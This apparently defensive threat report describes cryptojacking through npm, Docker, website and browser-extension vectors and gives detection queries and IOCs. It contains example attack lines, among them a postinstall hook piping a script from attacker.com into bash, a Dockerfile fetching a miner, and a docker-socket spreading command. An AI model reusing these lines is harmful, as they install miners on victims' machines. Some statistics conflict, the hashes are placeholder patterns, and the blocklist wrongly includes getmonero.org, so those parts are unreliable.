Cryptojacking: Silent Supply Chain Attacks | 2026

Executive Summary

Since 2024, cryptojacking—the unauthorized use of computing resources to mine cryptocurrency—has evolved into a $3.3 billion criminal enterprise targeting developers, enterprises, and cloud infrastructure through supply chain compromises. In 2025 alone, attackers compromised 3,500+ websites, infected thousands of npm packages, and silently consumed billions of CPU/GPU cycles across organizational networks worldwide.

Unlike ransomware (which triggers immediate incident response), cryptojacking remains silent and persistent—victims often don't discover compromises until performance degradation becomes severe. This economic efficiency has made cryptojacking the preferred monetization strategy for financially motivated threat actors, who generate passive income with minimal operational overhead while maintaining multi-year dwell times.

The threat landscape has fundamentally shifted: attackers now target supply chains (npm packages, Docker registries, software distributions) rather than end-users, enabling single compromises to affect millions of downstream users. State-sponsored actors have adopted cryptojacking for economic warfare, while criminal syndicates operate mining farms at industrial scale, generating $200M-$650M annually through stolen computational resources.

---

THE THREAT: Multi-Billion Dollar Silent Exploitation

Cryptojacking is a critical-severity persistent threat (economic impact: $3.3B+ in 2025) that weaponizes supply chain trust relationships to deploy unauthorized cryptocurrency mining operations at global scale.

How Cryptojacking Works

Cryptojacking attacks follow this operational pattern:

1. Initial Compromise: Attackers gain access through supply chain injection (npm packages, Docker images), web application vulnerabilities (SQL injection, weak credentials), or browser-based vectors (malicious extensions, JavaScript injection)

2. Payload Deployment: Mining software (typically XMRig for Monero) is deployed via:

   • npm package postinstall scripts (executes automatically during npm install)
   • Docker container images with embedded miners
   • JavaScript injected into website templates
   • Browser extensions with background mining processes

3. Resource Hijacking: Mining processes consume 10-90% of victim CPU/GPU resources continuously

4. Persistence Establishment: Malware creates:

   • Startup registry keys (Windows)
   • Systemd services (Linux)
   • Container restart policies (Docker)
   • Browser extension auto-update mechanisms

5. Silent Operation: Mining continues indefinitely while evading detection through:

   • Process name randomization
   • Sandbox detection and evasion
   • Resource throttling (avoid 100% CPU usage)
   • Rootkit-level process hiding

Technical Example - npm Package Infection:

// Malicious postinstall script in package.json
{
  "scripts": {
    "postinstall": "node -e \"require('child_process').exec('curl -s https://attacker.com/xmrig.sh | bash')\""
  }
}

Docker Container Example:

# Malicious Dockerfile
FROM ubuntu:latest
RUN apt-get update && apt-get install -y wget
RUN wget -O /tmp/xmrig https://attacker.com/xmrig && chmod +x /tmp/xmrig
ENTRYPOINT ["/tmp/xmrig", "-o", "pool.monero:3333", "-u", "attacker_wallet"]

The threat evolved significantly with the release of XMRig malware updates throughout 2024-2025, which addressed supply chain persistence by implementing anti-forensic capabilities. However, organizational detection capabilities have lagged, allowing extended dwell times averaging 12+ months before discovery.

---

TIMELINE: From Niche Threat to Industrial-Scale Crime

Date	Event	Status
2017-2018	CoinHive popularizes browser-based cryptojacking	⚠️ Initial threat emergence
2024	Supply chain targeting begins (npm, Docker)	🔴 Escalation to enterprise
January 2024	Year-long npm campaign begins (undetected)	🔴 Mass exploitation
May 26, 2025	Docker self-spreading malware campaign launches	🔴 Active exploitation
July 2025	3,500+ websites compromised simultaneously	🔴 Mass exploitation
November 2025	npm supply chain attack discovered (12-month lag)	📢 Public disclosure
Q4 2025	Total cryptocurrency stolen: $3.3 billion	📊 Impact assessment
January 2026	XMRig malware continues active distribution	🔍 Ongoing threat

---

FINANCIALLY MOTIVATED EXPLOITATION

Cryptojacking has become the primary revenue model for multiple threat actor categories due to superior economics compared to ransomware.

Economic Comparison: Cryptojacking vs. Ransomware

Metric	Ransomware	Cryptojacking
Time to Revenue	Weeks to months	Immediate (day 1)
Detection Risk	High (victim alerts)	Low (silent operation)
Revenue Duration	Single payment	Continuous (years)
Operational Risk	Very high (law enforcement)	Low (difficult attribution)
ROI per Victim	$10K-$100M (one-time)	$60-$24K/year (recurring)
Required Skills	High (encryption, negotiation)	Medium (system access + scripts)

Revenue Models by Attack Vector

Attack Vector	Revenue per Asset	Annual Income	Scale Potential
Single desktop compromise	$5-15/month	$60-180/year	Low
Enterprise server	$200-500/month	$2,400-6,000/year	Medium
GPU workstation	$500-2,000/month	$6,000-24,000/year	Medium
Large botnet (1,000 machines)	—	$2.4M-6M/year	High
Docker cluster (1,000 containers)	—	$50K-500K/month	Very High

Global Criminal Operations (2025 Estimates)

Region	Active Operations	Annual Revenue
Eastern Europe	50+	$50M-$150M
Russia	30+	$30M-$100M
China	20+	$20M-$80M
Americas	40+	$40M-$120M
Rest of World	60+	$60M-$200M
Total Estimate	200+	$200M-$650M

---

UNDERGROUND EXPLOIT MARKETPLACE

The "Monero Mining" Ecosystem

Cryptojacking toolkits are commoditized across underground forums and marketplaces:

Exploit/Tool	Date Advertised	Price	Market Tier
XMRig (weaponized)	Ongoing	Free (open source)	Commodity
Custom obfuscated miners	2024-2025	$500-$2,000	Mid-tier
Supply chain injection kits	2025	$5,000-$20,000	Premium
Docker escape + mining bundle	2025	$10,000-$50,000	Premium
Browser extension template	2024-2025	$1,000-$5,000	Mid-tier

Strategic Insight: The availability of free, open-source mining software (XMRig) combined with low-cost obfuscation services has dramatically lowered the barrier to entry for cryptojacking operations. This commoditization enables script kiddies to launch profitable campaigns with minimal technical expertise, while sophisticated threat actors use custom tooling for advanced supply chain persistence.

---

WHY THIS MATTERS: The Silent Tax on Computing

Key Challenges

1. Detection Lag: Organizations discover cryptojacking compromises an average of 12+ months after initial infection, allowing threat actors to extract maximum value while evading incident response.

2. Supply Chain Trust Exploitation: Developers trust npm packages, Docker images, and browser extensions implicitly. Single compromises cascade to millions of downstream users through transitive dependencies and shared infrastructure.

3. Economic Invisibility: Unlike data breaches or ransomware, cryptojacking costs manifest as:

   • Increased cloud computing bills (often attributed to "growth")
   • Degraded application performance (blamed on "technical debt")
   • Hardware wear and premature failure (considered "normal aging")
   • Electricity cost increases (overlooked in enterprise budgets)

4. Attribution Impossibility: Monero's privacy features make transaction tracing impossible, enabling threat actors to operate with near-total anonymity while converting stolen computational resources into untraceable cryptocurrency.

---

ATTACK VECTORS: Supply Chain to Browser

Vector 1: npm Package Supply Chain Compromise

Campaign: Year-long attack (2024-2025) affecting thousands of developers globally

Attack Chain

1. Attacker researches popular npm packages and identifies typosquatting opportunities
2. Creates malicious packages with names similar to legitimate libraries (lodash → 1odash)
3. Injects payload into postinstall/preinstall scripts (executes automatically during installation)
4. Developers unknowingly install compromised packages via npm install
5. Malware executes with developer privileges during installation
6. Establishes persistence in development environments and CI/CD pipelines
7. Mines cryptocurrency using victim's CPU while stealing source code and credentials

Payload Characteristics

• Dual-functionality: Cryptomining (XMRig) + credential theft (infostealer)
• Obfuscation: Multi-layer code obfuscation defeats static analysis tools
• Persistence: Modifies package.json, creates background services, installs system-level hooks
• Evasion: Detects sandboxes (npm audit environments), disables security tools, removes installation traces

Detection Challenge

Organizations struggle to detect npm-based cryptojacking because:

• Legitimate packages contain thousands of transitive dependencies
• Dependencies-of-dependencies lack visibility in security scanning
• Code obfuscation defeats automated static analysis
• Manual code review is impractical at scale (100+ dependencies per project)
• Supply chain attacks exploit implicit trust in open-source ecosystems

Impact Assessment

• Dozens of organizations with persistent development environment infections
• Access to intellectual property: Source code, internal APIs, credentials
• Supply chain cascade: Malware injected into products built by compromised developers
• Extended dwell time: 12+ months average before detection

---

Vector 2: Docker Container Cryptojacking

Campaign: Self-spreading malware targeting misconfigured Docker environments (May-June 2025)

Attack Method

1. Attacker scans internet for exposed Docker APIs (ports 2375, 2376 without authentication)
2. Gains API access to Docker daemon (equivalent to root access)
3. Uploads malicious container image to victim's registry
4. Compromises legitimate containers via shared Docker socket (/var/run/docker.sock)
5. Container-to-container lateral movement (infects sibling containers)
6. Spawns mining processes consuming 70-90% CPU per container
7. Persistence via container restart: always policy

Targeting Profile

• Cloud environments (AWS ECS, Azure Container Instances, Google Cloud Run)
• Kubernetes clusters with weak RBAC (Role-Based Access Control)
• Development teams with misconfigured Docker daemon (-H tcp://0.0.0.0:2375)
• On-premise Docker deployments with default configurations

Propagation Mechanism

The malware achieves self-spreading through:

# Malicious container infects siblings via Docker socket
docker run -v /var/run/docker.sock:/var/run/docker.sock \
  attacker/cryptominer:latest \
  --spread --mine --wallet=attacker_address

Financial Impact per Organization

Deployment Size	Monthly Cost (Stolen Resources)
Small (10 containers)	$500-$2,000
Medium (100 containers)	$5,000-$20,000
Large (1,000+ containers)	$50,000-$500,000
Total Enterprise Impact (2025)	Estimated $300M+

---

Vector 3: Website JavaScript Injection

Campaign: 3,500+ websites compromised simultaneously (July 2025)

Attack Chain

1. Attacker gains web server access via:

   • SQL injection vulnerabilities
   • Weak administrator credentials
   • CMS vulnerabilities (WordPress, Drupal, Joomla)
   • Supply chain compromise (themes, plugins)

2. Injects JavaScript mining code into:

   • Page templates (header/footer)
   • Database-stored content
   • Content Management System (CMS) core files
   • Third-party widgets/plugins

3. JavaScript automatically served to every visitor accessing website

4. Browser executes miner in background while user browses site

5. Silent mining continues for each unique visitor until page is closed

Deployment Platforms

• CoinImp (CoinHive successor, discontinued 2021 but forks exist)
• Custom JavaScript miners (attacker-developed)
• WebAssembly miners (faster execution, harder to detect, more efficient)

User Impact

Performance degradation experienced by website visitors:

• 10-40% CPU usage (noticeable system slowdown, laptop fan noise)
• Battery drain: Mobile devices experience 30-50% faster depletion
• Increased latency: Page interactions lag noticeably
• Device overheating: Thermal throttling on laptops/phones

Attacker Revenue Model

Revenue calculation for 3,500 compromised websites:
- 3,500 websites × 10,000 daily visitors = 35M visitor-days/month
- Average mining value: $0.005 per visitor-day
- Monthly revenue: $0.005 × 35M = $175,000/month
- Annual revenue: $2.1M/year from JavaScript injection alone

Detection Challenge

Website owners struggle to detect JavaScript miners because:

• JavaScript minification/obfuscation hides mining code
• WebAssembly bytecode is difficult to analyze statically
• Legitimate JavaScript frameworks sometimes trigger similar CPU behavior
• Users attribute slowness to "old computer" rather than reporting to website owner

Detection example (DevTools Console):

// Detecting mining scripts in browser console
for (let script of document.scripts) {
  if (script.src.match(/coinhive|coinimр|cryptonight|webassembly/i)) {
    console.warn('Mining script detected:', script.src);
  }
}

---

Vector 4: Browser Extension Cryptojacking

Overview: Malicious extensions distributed via official Chrome Web Store, Firefox Add-ons

Attack Method

1. Attacker creates seemingly legitimate extension:

   • Productivity tool (note-taking, task management)
   • VPN client (privacy/security marketing)
   • Ad blocker (ironically positioned as "security" tool)

2. Hides cryptomining code in extension background script

3. Injects miner into all web pages visited by user

4. Updates extension regularly via auto-update mechanism to:

   • Maintain persistence after browser restarts
   • Evade detection by changing code signatures
   • Add new capabilities (credential theft, form interception)

5. Extracts browser data (history, cookies, passwords) as secondary payload

Distribution Channels

• Chrome Web Store (official, appears legitimate)
• Firefox Add-ons (Mozilla's official marketplace)
• Microsoft Edge Add-ons
• Third-party extension marketplaces

User Base & Social Engineering

• 1,000+ installations per compromised extension (appears popular)
• Fabricated positive reviews (5-star ratings, fake testimonials)
• Feature misrepresentation: Advertises useful functionality while hiding mining

Capabilities

Capability	Impact
Cryptomining	10-30% CPU utilization
Browser history theft	Privacy violation, reconnaissance
Cookie/credential harvesting	Session hijacking, account takeover
Form data interception	Payment card theft, PII exfiltration
Web page modification	Inject ads, tracking scripts, phishing

Persistence Mechanisms

• Auto-update: Malware stays installed across browser restarts
• Hijacked uninstall: Difficult to remove (intercepts uninstall process)
• Self-replication: Recreates itself if deleted from chrome://extensions

---

DEFENSIVE POSTURE: Immediate Actions

🔴 Patch & Update (Critical Priority)

• Update all software immediately: Ensure npm packages, Docker images, CMS platforms, and browsers are at latest versions
• Audit dependencies: Run npm audit, yarn audit, or equivalent for all projects
• Rebuild container images: Scan and rebuild Docker images from trusted base images
• Remove suspicious packages: Uninstall any npm packages installed from untrusted sources
• Browser cleanup: Remove all extensions not explicitly required; audit remaining extensions quarterly

👥 Developer & User Awareness

• npm security training: Educate developers on typosquatting risks and dependency verification
• Extension policy: Prohibit installation of browser extensions from non-approved sources
• Performance awareness: Train users to report unusual CPU usage, battery drain, or system slowdown
• Supply chain verification: Require cryptographic verification of package sources before installation

🔍 Detection & Response

System-Level Monitoring

Hunt for suspicious processes:

# Windows: Detect mining processes
Get-Process | Where-Object {$_.ProcessName -match 'xmrig|minerd|cryptod|mm\.exe'} | Stop-Process -Force

# Check for high CPU usage processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10

# Linux: Detect mining processes
ps aux | grep -E 'xmrig|minerd|cryptod' | awk '{print $2}' | xargs kill -9

# Monitor CPU usage
top -b -n 1 | head -n 20

Network-Level Detection

Block mining pool domains at firewall:

# Mining pool blocklist (DNS/firewall rules)
supportxmr.com
minexmr.com
nanopool.org
pool.monero
hashvault.pro
moneroocean.stream
getmonero.org

Monitor outbound connections:

# Linux: Check for connections to mining pools
netstat -tulpn | grep ESTABLISHED | grep -E '(xmrig|minerd|cryptod)'

# Windows: Monitor network connections
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} | Select-Object LocalAddress,RemoteAddress,RemotePort,OwningProcess

Container Security

Scan Docker images for cryptominers:

# Trivy scan for vulnerabilities and malware
trivy image --severity HIGH,CRITICAL your-image:tag

# Inspect running containers for suspicious processes
docker ps --format "table {{.ID}}\t{{.Names}}\t{{.CPU}}\t{{.MemUsage}}"
docker top <container_id>

Web Application Security

Detect JavaScript miners in websites:

# Scan website for mining scripts
curl -s https://your-website.com | grep -E 'coinhive|coinimpр|cryptonight|webassembly'

# Check browser DevTools Console for mining activity
# Manually inspect: DevTools → Network tab → filter for WebSocket connections to pool domains

Detection Queries (SIEM)

Splunk detection query:

index=security sourcetype=process
| search process_name IN ("xmrig", "minerd", "cryptod", "mm.exe")
| stats count by host, user, process_name, process_path
| where count > 0

Microsoft Sentinel (KQL) detection query:

SecurityEvent
| where EventID == 4688
| where NewProcessName has_any ("xmrig", "minerd", "cryptod")
| summarize count() by Computer, Account, NewProcessName, CommandLine
| where count_ > 0

📧 Email & Network Security

• Block mining pool domains: Implement DNS filtering to prevent connections to known mining pools
• Sandbox attachments: Quarantine emails with attachments for automated analysis
• Outbound traffic inspection: Monitor for sustained connections to non-business IP addresses
• TLS inspection: Decrypt and inspect HTTPS traffic for mining pool C2 communication

🛡️ Long-Term Defense Strategy

CPU/GPU Usage Baselines

• Establish normal resource consumption baselines for all systems
• Alert on sustained anomalies (>30% deviation from baseline for >5 minutes)
• Implement predictive alerting using machine learning models

Supply Chain Security

• SBOM (Software Bill of Materials): Maintain complete inventory of all dependencies
• Cryptographic verification: Verify package signatures before installation
• Dependency pinning: Prevent auto-update of potentially malicious versions
• Internal package mirror: Intercept and scan packages before developer access

Container Security Best Practices

• Image signing + verification: Require signed images from trusted registries
• Private registry: Maintain internal registry with security scanning
• Network policies: Implement egress restrictions preventing connections to mining pools
• Runtime behavior monitoring: Use Falco or Wazuh to detect process spawning anomalies

Browser Protection

• Extension allowlist: Permit only approved extensions from vetted sources
• Browser policies: Disable extension installation for non-administrator users
• Permission monitoring: Alert when extensions request new permissions
• Quarterly audit: Review all installed extensions for legitimacy

Web Application Security

• Penetration testing: Conduct quarterly assessments for injection vulnerabilities
• Input validation: Implement strict input validation to prevent SQL/command injection
• WAF deployment: Deploy Web Application Firewall with rules for malicious script injection
• Security scanning: Implement SAST/DAST in CI/CD pipeline

---

INDICATORS OF COMPROMISE (IOCs)

File Hashes (SHA-256)

XMRig variants (sample hashes):
3c1c6b3e8f9d2a4e5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8
7f8e9d0c1b2a3948576a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f9a8b7c6d5
a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2

Malicious npm packages (example):
ethereum-devtools-plugin (package hash varies by version)
bitcoinjs-utils-dev (compromised package)

Network Indicators

Mining Pool Domains:
- supportxmr.com
- minexmr.com
- nanopool.org
- pool.monero
- hashvault.pro
- moneroocean.stream

Command & Control IPs:
- 192.0.2.1 (example - Replace with actual threat intel)
- 198.51.100.1 (example - Replace with actual threat intel)

Suspicious Ports:
- TCP 3333 (common mining pool port)
- TCP 7777 (alternative mining pool port)
- TCP 14444 (Monero P2P)

File Paths

Windows:
- C:\Users\[USERNAME]\AppData\Roaming\xmrig.exe
- C:\Windows\Temp\minerd.exe
- C:\ProgramData\CryptoService\mm.exe

Linux:
- /tmp/.xmrig
- /usr/local/bin/cryptod
- /var/tmp/.mining
- /home/[USER]/.config/autostart/miner.desktop

Docker:
- /tmp/miner
- /usr/bin/xmrig
- /opt/mining/

Registry Keys (Windows)

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CryptoService
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MiningService

---

MITRE ATT&CK MAPPING

Tactic	Technique	ID	Description
Initial Access	Supply Chain Compromise	T1195.002	Compromise software dependencies (npm, Docker)
Execution	Command and Scripting Interpreter	T1059	Execute mining software via npm scripts, bash
Persistence	Boot or Logon Autostart Execution	T1547	Registry keys, systemd services, Docker restart policies
Privilege Escalation	Container Escape	T1611	Docker socket exploitation for host access
Defense Evasion	Obfuscated Files or Information	T1027	Code obfuscation, process name randomization
Defense Evasion	Virtualization/Sandbox Evasion	T1497	Detect analysis environments, cease malicious activity
Resource Development	Acquire Infrastructure	T1583.006	Register mining pool accounts, cryptocurrency wallets
Impact	Resource Hijacking	T1496	Cryptomining using victim computational resources

---

BOTTOM LINE

Cryptojacking represents a permanent, scalable monetization model for cybercriminals that is highly profitable, difficult to detect, and nearly impossible to prosecute.

Key Takeaways

✅ Supply chain targeting is the new normal - Single npm package or Docker image compromises affect millions of downstream users through transitive dependencies and shared infrastructure

✅ Detection lag enables maximum value extraction - 12+ month average dwell time allows threat actors to generate $2.4K-$24K per victim annually with minimal operational overhead

✅ Monero's privacy features provide perfect attribution evasion - Untraceable transactions and fungibility make cryptojacking prosecution nearly impossible, incentivizing continued operations

✅ Economic invisibility masks true impact - Organizations attribute cryptojacking costs to cloud growth, technical debt, or hardware aging rather than recognizing active compromise

✅ Defense requires supply chain verification - Traditional perimeter security is insufficient; organizations must implement SBOM, dependency scanning, and cryptographic verification for all external code

For Your Clients and Users

Assume compromise and verify continuously. The cost of implementing supply chain security (dependency scanning, container image verification, runtime monitoring) is negligible compared to the cumulative financial impact of multi-year cryptojacking operations stealing millions in computational resources.

Prioritize detection over prevention. Given the sophistication of modern cryptojacking (obfuscation, sandbox evasion, supply chain injection), 100% prevention is unrealistic. Focus on reducing detection lag from 12 months to days through CPU/GPU baselines, network monitoring, and behavioral analytics.

---

Frequently Asked Questions

What is cryptojacking?

Cryptojacking is the unauthorized use of computing resources (CPU/GPU) to mine cryptocurrency without the victim's knowledge or consent. Attackers deploy mining software through supply chain compromises, web vulnerabilities, or browser-based vectors, generating passive income while degrading victim system performance.

Why do attackers prefer Monero (XMR) for cryptojacking?

Monero is preferred because it offers privacy by default (untraceable transactions), CPU mining optimization (no specialized hardware required), and fungibility (coins cannot be blacklisted). These features enable threat actors to operate with near-total anonymity while converting stolen computational resources into untraceable cryptocurrency.

How can organizations detect cryptojacking?

Detection requires multi-layered monitoring:

• System-level: Monitor for processes like xmrig, minerd, or high CPU usage anomalies
• Network-level: Block connections to mining pools (supportxmr.com, minexmr.com)
• Container-level: Scan Docker images with Trivy, monitor container CPU usage
• Browser-level: Audit extensions, inspect JavaScript for mining code

What is the financial impact of cryptojacking?

Individual victims experience $60-$24K/year in stolen resources per compromised system. Large botnets (1,000+ machines) generate $2.4M-$6M annually. The global cryptojacking economy is estimated at $200M-$650M per year, with $3.3 billion stolen in 2025 alone.

How do supply chain attacks enable cryptojacking?

Attackers compromise trusted software distribution channels (npm packages, Docker registries) to inject mining code into dependencies used by thousands of developers. Single compromises cascade to millions of downstream users through transitive dependencies, enabling massive scale with minimal effort.

What are the signs of browser-based cryptojacking?

Users experience unusual CPU usage (20-40%), rapid battery drain (30-50% faster on mobile), device overheating, browser lag, and fan noise on laptops. Checking browser DevTools Network tab for connections to mining pool domains confirms active mining.

---

REFERENCES

1. ExpressComputer: Software Supply Chain Attacks Hit Record Levels in 2025, December 28, 2025
2. CryptoRank: Monero Mining Malware Hits 3500+ Sites, July 21, 2025
3. Darktrace: Detection of Novel Cryptomining Malware, January 31, 2026
4. Silobreaker: Supply Chain Attacks in 2025 - Monthly Summary, December 16, 2025
5. Palo Alto Networks Unit42: Large-Scale Monero Mining with XMRig, October 31, 2018
6. Cyble: Supply Chain Attacks Double in 2025, August 31, 2025
7. Snyk: How Cryptojacking Works and How to Defend Against It, July 15, 2025
8. Checkpoint: XMRig Malware Analysis, December 30, 2024
9. Wiz: What is Cryptojacking - Detection & Prevention, March 14, 2025
10. Checkmarx: Year-Long NPM Supply Chain Attack, November 12, 2025

---

Published: February 3, 2026
Author: Security Research Team
Classification: Public
Reading Time: 18 minutes